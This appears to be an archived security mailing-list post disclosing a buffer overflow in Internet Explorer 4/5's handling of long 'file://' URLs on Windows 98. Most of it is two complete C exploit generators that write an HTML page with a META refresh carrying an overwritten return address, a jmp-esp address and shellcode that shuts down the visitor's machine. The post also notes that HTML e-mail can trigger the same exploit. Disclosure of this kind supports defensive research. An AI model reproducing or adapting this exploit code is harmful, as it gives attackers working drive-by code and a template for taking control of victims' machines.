Hello Microsoft Internet Explorer 4/5 overflows when the handling of "file://" specification. This overflow occurs when we are logging on to the Microsft Network, this overflow can be verified if the long name is specfied to the "file://". For example, file://test/AAAAAAAAAAAA.... (long 'A') This is most typical exploitable buffer overflow, because this overflow overwrites the RET address and can control the EIP. If you try the previously described example, you will be able to confirm "EIP 41414141H" at the GPF dialog box. The RET is stored at 39H,40H,41H,42H from the next of "file://". This overflow contains the possibility of the virus and trojans infection, sytsem destoruction, intorusion, and so on. This overflow contains the possibility of the virus and trojans infection, sytsem destruction, intrusion, and so on. If this overflow is used by attacker, any codes will be sent to the visitors who browse the exploting page, and the client host will be cracked. This overflow also causes the problem on many kind of e-mail clients software. If the user opens the HTML mail which contains the exploit code, the exploit code will be executed, because many e-mail software uses the IE for the browsing of HTML mail. We coded the following sample codes. This codes generates the HTML file that reboots the client PC. They are tested on Windows98 Japanese Edition. --- /*============================================================================= Microsoft IE4 for Windows98 exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ============================================================================= */ #include <stdio.h> #include <windows.h> #define MAXBUF 1000 #define RETADR 53 unsigned int mems[]={ 0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000, 0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000, 0xbfee0000,0xbfee5000,0xbff20000,0xbff47000, 0xbff50000,0xbff61000,0xbff70000,0xbffc6000, 0xbffc9000,0xbffe3000,0,0}; unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, }; unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { FILE *fp; unsigned int i,ip; unsigned char buf[MAXBUF]; if (argc<2){ printf("usage %s output_htmlfile\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE; fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/"); for (i=0;;i+=2){ if (mems[i]==0){ printf("Can not find jmp code.\n"); exit(1); } if ((ip=search_mem(fp,(unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe4))!=0) break; } printf("Jumping address : %x\n",ip); memset(buf,0x41,MAXBUF); buf[RETADR-1]=0x90; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; memcpy(buf+80,exploit_code,strlen(exploit_code)); buf[MAXBUF]=0; fprintf(fp,"%s/\">\n<HTML><B>",buf); fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>"); fprintf(fp,"If you are using IE4 for Japanese Windows98, "); fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>"); fprintf(fp,"</HTML>\n"); fclose(fp); printf("%s created.\n",argv[1]); return FALSE; } /*========================================================================= Microsoft IE45 for Windows98 exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguinat_private) ========================================================================= */ #include <stdio.h> #include <windows.h> #define MAXBUF 1000 #define RETADR 53 /* jmp esp (FF E4) code is stored in this area. You must change this address for non-Japanese Windows98 */ #define EIP 0xbfb75a35 unsigned char exploit_code[200]={ 0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53, 0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3, 0x00 }; main(int argc,char *argv[]) { FILE *fp; unsigned int ip; unsigned char buf[MAXBUF]; if (argc<2){ printf("usage %s output_htmlfile\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE; fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/"); memset(buf,0x41,MAXBUF); ip=EIP; buf[RETADR-1]=0x7f; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=( ip>>24)&0xff; memcpy(buf+80,exploit_code,strlen(exploit_code)); buf[MAXBUF]=0; fprintf(fp,"%s/\">\n<HTML><B>",buf); fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>"); fprintf(fp,"If you are using IE5 for Japanese Windows98, "); fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>"); fprintf(fp,"</HTML>\n"); fclose(fp); printf("%s created.\n",argv[1]); return FALSE; } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguinat_private (webmaster) % eEye Digital Security Team [ http://www.eEye.com ] unyunat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:10:14 PDT